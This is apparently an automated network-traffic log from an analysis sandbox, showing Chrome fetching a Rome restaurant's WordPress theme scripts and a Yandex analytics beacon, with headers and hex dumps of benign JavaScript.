                                                                                                                                              2025-01-03 16:33:07 UTC16384INData Raw: 74 65 6d 73 53 6f 72 74 44 61 74 61 28 65 29 7d 2c 6c 2e 5f 67 65 74 53 6f 72 74 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 67 65 74 53 6f 72 74 44 61 74 61 3b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 74 29 7b 76 61 72 20 69 3d 74 5b 65 5d 3b 74 68 69 73 2e 5f 73 6f 72 74 65 72 73 5b 65 5d 3d 66 28 69 29 7d 7d 2c 6c 2e 5f 75 70 64 61 74 65 49 74 65 6d 73 53 6f 72 74 44 61 74 61 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 26 26 74 2e 6c 65 6e 67 74 68 2c 69 3d 30 3b 65 26 26 69 3c 65 3b 69 2b 2b 29 7b 76 61 72 20 6f 3d 74 5b 69 5d 3b 6f 2e 75 70 64 61 74 65 53 6f 72 74 44 61 74 61 28 29 7d 7d 3b 76 61 72 20 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20
                                                                                                                                              Data Ascii: temsSortData(e)},l._getSorters=function(){var t=this.options.getSortData;for(var e in t){var i=t[e];this._sorters[e]=f(i)}},l._updateItemsSortData=function(t){for(var e=t&&t.length,i=0;e&&i<e;i++){var o=t[i];o.updateSortData()}};var f=function(){function
                                                                                                                                              2025-01-03 16:33:07 UTC268INData Raw: 2e 5f 67 65 74 4f 70 74 69 6f 6e 28 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 29 3f 74 68 69 73 2e 6e 65 65 64 73 56 65 72 74 69 63 61 6c 52 65 73 69 7a 65 4c 61 79 6f 75 74 28 29 3a 69 2e 63 61 6c 6c 28 74 68 69 73 29 7d 3b 76 61 72 20 6a 3d 64 2e 5f 67 65 74 4f 70 74 69 6f 6e 3b 72 65 74 75 72 6e 20 64 2e 5f 67 65 74 4f 70 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 61 3f 76 6f 69 64 20 30 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 73 48 6f 72 69 7a 6f 6e 74 61 6c 3f 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 73 48 6f 72 69 7a 6f 6e 74 61 6c 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 68 6f 72 69 7a 6f 6e 74 61 6c 3a 6a 2e 61 70 70 6c 79 28 74 68 69 73 2e 69 73 6f 74 6f 70 65 2c 61 72 67
                                                                                                                                              Data Ascii: ._getOption("horizontal")?this.needsVerticalResizeLayout():i.call(this)};var j=d._getOption;return d._getOption=function(a){return"horizontal"==a?void 0!==this.options.isHorizontal?this.options.isHorizontal:this.options.horizontal:j.apply(this.isotope,arg


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              126192.168.2.164985887.250.251.1194436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:06 UTC1765OUTGET /watch/99162160?wmode=7&page-url=https%3A%2F%2Fwww.cipassoitalia.it%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22117%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228%22%2C%22Chromium%22%3Bv%3D%22117%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A117.0.5938.132%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22117.0.5938.132%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228.0.0.0%22%2C%22Chromium%22%3Bv%3D%22117.0.5938.132%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A10.0.0&browser-info=pv%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A0%3Als%3A1370925244722%3Ahid%3A679857121%3Az%3A-300%3Ai%3A20250103113304%3Aet%3A1735921984%3Ac%3A1%3Arn%3A888462558%3Arqn%3A1%3Au%3A1735921984342483081%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Afp%3A15621%3Awv%3A2%3Ads%3A86%2C715%2C461%2C117%2C777%2C0%2C%2C%2C%2C%2C%2C%2C%3Aco%3A0%3Acpf%3A1%3Ans%3A1735921964729%3Arqnl%3A1%3Ast%3A1735921986%3At%3ACiPASSO.%20Nel%20cuore%20di%20Roma%2C%20ad%20un%20passo%20dal%20Pantheon.&t=gdpr(14)clc(0-0-0)rqnt(1)aw(1)rcm(1) [TRUNCATED]
                                                                                                                                              Host: mc.yandex.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Origin: https://www.cipassoitalia.it
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: i=narlABsq63nROyU6LhKlC/QyBgl1C5gTK9qc3JdRc3H3zDytph2vBN10ZgqZgH/k820S88p65t19wIhYvE7/vXqicU8=; yandexuid=8563067781735921985; yashr=2978277861735921985
                                                                                                                                              2025-01-03 16:33:06 UTC2880INHTTP/1.1 302 Moved temporarily
                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                              Access-Control-Allow-Origin: https://www.cipassoitalia.it
                                                                                                                                              Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                              Connection: Close
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:06 GMT
                                                                                                                                              Expires: Fri, 03-Jan-2025 16:33:06 GMT
                                                                                                                                              Last-Modified: Fri, 03-Jan-2025 16:33:06 GMT
                                                                                                                                              Location: /watch/99162160/1?wmode=7&page-url=https%3A%2F%2Fwww.cipassoitalia.it%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22117%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228%22%2C%22Chromium%22%3Bv%3D%22117%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A117.0.5938.132%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22117.0.5938.132%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228.0.0.0%22%2C%22Chromium%22%3Bv%3D%22117.0.5938.132%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A10.0.0&browser-info=pv%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A0%3Als%3A1370925244722%3Ahid%3A679857121%3Az%3A-300%3Ai%3A20250103113304%3Aet%3A1735921984%3Ac%3A1%3Arn%3A888462558%3Arqn%3A1%3Au%3A1735921984342483081%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Afp%3A15621%3Awv%3A2%3Ads%3A86%2C715%2C461%2C117%2C777%2C0%2C%2C%2C%2C%2C%2C%2C%3Aco%3A0%3Acpf%3A1%3Ans%3A1735921964729%3Arqnl%3A1%3Ast%3A1735921986%3At%3ACiPASSO.%20Nel%20cuore%20di%20Roma%2C%20ad%20un%20passo%20dal%20Pantheon.&t=gdpr%2814%29clc%280-0-0%29rq [TRUNCATED]
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Set-Cookie: yabs-sid=814606481735921986; Path=/; SameSite=None; Secure
                                                                                                                                              Set-Cookie: yandexuid=8563067781735921985; Expires=Sat, 03-Jan-2026 16:33:06 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                                              Set-Cookie: yuidss=8563067781735921985; Expires=Sat, 03-Jan-2026 16:33:06 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                                              Set-Cookie: ymex=1767457986.yrts.1735921986; Expires=Sat, 03-Jan-2026 16:33:06 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                                              Set-Cookie: receive-cookie-deprecation=1; Expires=Sat, 03-Jan-2026 16:33:06 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure; HttpOnly; Partitioned
                                                                                                                                              Set-Cookie: bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzMiIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzIiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzMiIi; Expires=Sat, 03-Jan-2026 16:33:06 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              2025-01-03 16:33:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              127192.168.2.164985989.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:06 UTC727OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow-video.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:07 UTC277INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:06 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 23077
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:07 UTC16107INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 0a 2f 2f 20 41 56 49 41 20 56 49 44 45 4f 20 41 50 49 20 2d 20 6d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 79 6f 75 74 75 62 65 2c 20 76 69 6d 65 6f 20 61 6e 64 20 68 74 6d 6c 20 35 20 75 73 65 20 74 68 65 20 73 61 6d 65 20 69 6e 74 65 72 66 61 63 65 0a 2f 2f 20 0a 2f 2f 20 72 65 71 75 69 72 65 73 20 66 72 6f 6f 67 61 6c 6f 6f 70 20 76 69 6d 65 6f 20 6c 69 62 72 61 72 79 20 61 6e 64 20 79 6f 75 74 75 62 65 20 69 66 72 61 6d 65 20 61 70 69 20 28 79 74 20 63 61 6e 20
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// // AVIA VIDEO API - make sure that youtube, vimeo and html 5 use the same interface// // requires froogaloop vimeo library and youtube iframe api (yt can
                                                                                                                                              2025-01-03 16:33:07 UTC6970INData Raw: 63 74 69 6f 6e 20 77 68 65 6e 20 74 68 65 20 6d 65 74 68 6f 64 20 72 65 74 75 72 6e 73 20 61 20 76 61 6c 75 65 2e 0a 20 20 20 20 20 20 20 20 20 2a 2f 0a 20 20 20 20 20 20 20 20 61 70 69 3a 20 66 75 6e 63 74 69 6f 6e 28 6d 65 74 68 6f 64 2c 20 76 61 6c 75 65 4f 72 43 61 6c 6c 62 61 63 6b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 74 68 69 73 2e 65 6c 65 6d 65 6e 74 20 7c 7c 20 21 6d 65 74 68 6f 64 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 65 6c 66 20 3d 20 74 68 69 73 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 6c 65 6d 65 6e 74 20 3d 20 73 65 6c 66 2e 65 6c 65 6d 65 6e
                                                                                                                                              Data Ascii: ction when the method returns a value. */ api: function(method, valueOrCallback) { if (!this.element || !method) { return false; } var self = this, element = self.elemen


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              128192.168.2.164985589.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:06 UTC741OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_accordion/slideshow_accordion.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:07 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:06 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 8442
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:07 UTC8442INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 41 76 69 61 63 63 6f 72 64 69 6f 6e 20 53 6c 69 64 65 73 68 6f 77 20 0a 2f 2f 20 0a 2f 2f 20 61 63 63 6f 72 64 69 6f 6e 20 73 6c 69 64 65 72 20 73 63 72 69 70 74 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                                                                                              Data Ascii: (function($){"use strict";// -------------------------------------------------------------------------------------------// Aviaccordion Slideshow // // accordion slider script// ---------------------------------------------------------------------


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              129192.168.2.164985689.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:06 UTC743OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_fullscreen/slideshow_fullscreen.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:07 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:06 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 5625
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:07 UTC5625INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 46 75 6c 6c 73 63 72 65 65 6e 20 53 6c 69 64 65 73 68 6f 77 20 0a 2f 2f 20 0a 2f 2f 20 65 78 74 65 6e 64 73 20 61 76 69 61 20 73 6c 69 64 65 73 68 6f 77 20 73 63 72 69 70 74 20 77 69 74 68 20 61 20 6d 6f 72 65 20 73 6f 70 68 69 73 74 69 63 61 74 65 64 20 70 72 65 6c 6f 61 64 65 72 20 61 6e 64 20 66 69 78 65 64 20 73 69 7a 65 20 66 6f 72 20 73 6c 69 64 65 72 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// Fullscreen Slideshow // // extends avia slideshow script with a more sophisticated preloader and fixed size for slider// ---------------------------------


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              130192.168.2.164986189.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:06 UTC546OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/notification/notification.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:07 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:07 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 2996
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:07 UTC2996INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 4d 65 73 73 61 67 65 20 42 6f 78 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 0a 20 20 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 20 20 20 20 24 2e 66 6e 2e 61 76 69 61 5f 73
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// Message Box// -------------------------------------------------------------------------------------------(function($){ "use strict"; $.fn.avia_s


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              131192.168.2.164986089.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:06 UTC745OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_layerslider/slideshow_layerslider.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:07 UTC275INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:07 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 849
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:07 UTC849INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 09 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 6d 61 6b 65 73 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 66 69 78 65 64 20 63 6f 6e 74 61 69 6e 65 72 20 68 65 69 67 68 74 20 69 73 20 72 65 6d 6f 76 65 64 20 6f 6e 63 65 20 74 68 65 20 6c 61 79 65 72 73 6c 69 64 65 72 20 69 73 20 6c 6f 61 64 65 64 2c 20 73 6f 20 69 74 20 61 64 61 70 74 73 20 74 6f 20 74 68 65 20 73 63 72 65 65 6e 20 72 65 73 6f 6c 75 74 69 6f 6e 0a 2f 2f
                                                                                                                                              Data Ascii: (function($){"use strict";// -------------------------------------------------------------------------------------------// makes sure that the fixed container height is removed once the layerslider is loaded, so it adapts to the screen resolution//


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              132192.168.2.164986287.250.251.1194436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
